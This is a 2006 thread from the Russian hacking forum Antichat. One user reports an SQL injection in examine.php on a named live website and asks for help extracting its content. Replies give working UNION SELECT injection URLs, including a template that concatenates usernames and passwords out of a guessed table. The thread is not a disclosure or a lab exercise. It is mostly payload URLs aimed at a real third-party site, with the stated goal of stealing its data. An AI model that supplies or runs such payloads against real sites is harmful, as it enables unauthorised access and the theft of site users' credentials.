ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL инъекция на Pimpmyguide.com
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

SQL инъекция на Pimpmyguide.com
  #1  
Старый 30.05.2006, 16:44
Аватар для Inviz
Inviz
Новичок
Регистрация: 30.05.2006
Сообщений: 4
Провел на форуме:
19841

Репутация: 0
По умолчанию SQL инъекция на Pimpmyguide.com
Здрасьте.

нашел багу на pimpmyguide.com (эксплойты для онлайн игр).

_http://www.pimpmyguide.com/examine.php?id=5&tid=9

Подвержены значения id и tid:

_http://www.pimpmyguide.com/examine.php?id=5&tid=9 or tid=6 LIMIT 10--



У самого опыта маловато, вообщем, попытался узнать, поддерживает ли сервер вложенные запросы

_http://www.pimpmyguide.com/examine.php?id=5&tid=(SELECT 9) работает, а (SELECT 3+6) не работает

Значит нет?

_http://www.pimpmyguide.com/examine.php?id=5&tid=6 UNION SELECT null,null,null,null --

- нулей пробовал кучу, все равно не хочет.

Хочется контент получить,.. Кто нибудь может помочь?

Спасибо.
Последний раз редактировалось Inviz; 30.05.2006 в 16:55..
 
Ответить с цитированием

  #2  
Старый 01.06.2006, 11:12
Аватар для ProblemaT2
ProblemaT2
Новичок
Регистрация: 31.03.2006
Сообщений: 23
Провел на форуме:
82526

Репутация: 2
По умолчанию
Цитата:
Сообщение от Inviz  
Здрасьте.

нашел багу на pimpmyguide.com (эксплойты для онлайн игр).

_http://www.pimpmyguide.com/examine.php?id=5&tid=9

Подвержены значения id и tid:

_http://www.pimpmyguide.com/examine.php?id=5&tid=9 or tid=6 LIMIT 10--



У самого опыта маловато, вообщем, попытался узнать, поддерживает ли сервер вложенные запросы

_http://www.pimpmyguide.com/examine.php?id=5&tid=(SELECT 9) работает, а (SELECT 3+6) не работает

Значит нет?

_http://www.pimpmyguide.com/examine.php?id=5&tid=6 UNION SELECT null,null,null,null --

- нулей пробовал кучу, все равно не хочет.

Хочется контент получить,.. Кто нибудь может помочь?

Спасибо.
Держи
http://www.pimpmyguide.com/examine.php?id=5&tid=9+union+select+1,2,3,4,char(1 16,101,115,116),6/*
 
Ответить с цитированием

  #3  
Старый 04.07.2006, 01:44
Аватар для ~Fenix~
~Fenix~
Banned
Регистрация: 26.07.2005
Сообщений: 240
Провел на форуме:
1266236

Репутация: 75
Отправить сообщение для ~Fenix~ с помощью ICQ
По умолчанию
Цитата:
Сообщение от ProblemaT2  
Держи
[forbidden link]
а смысл то с этого какой????
можно узнать версию, ну тоже смысла мало, вобщем подбирай название таблицы и составь запрос типа такого
_http://www.pimpmyguide.com/examine.php?id=1%20union%20select%201,2,3,4,concat (uname,char(58),passwd),6 from название_таблицы/* и читай статьи
Последний раз редактировалось VIYu; 04.07.2006 в 01:47..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ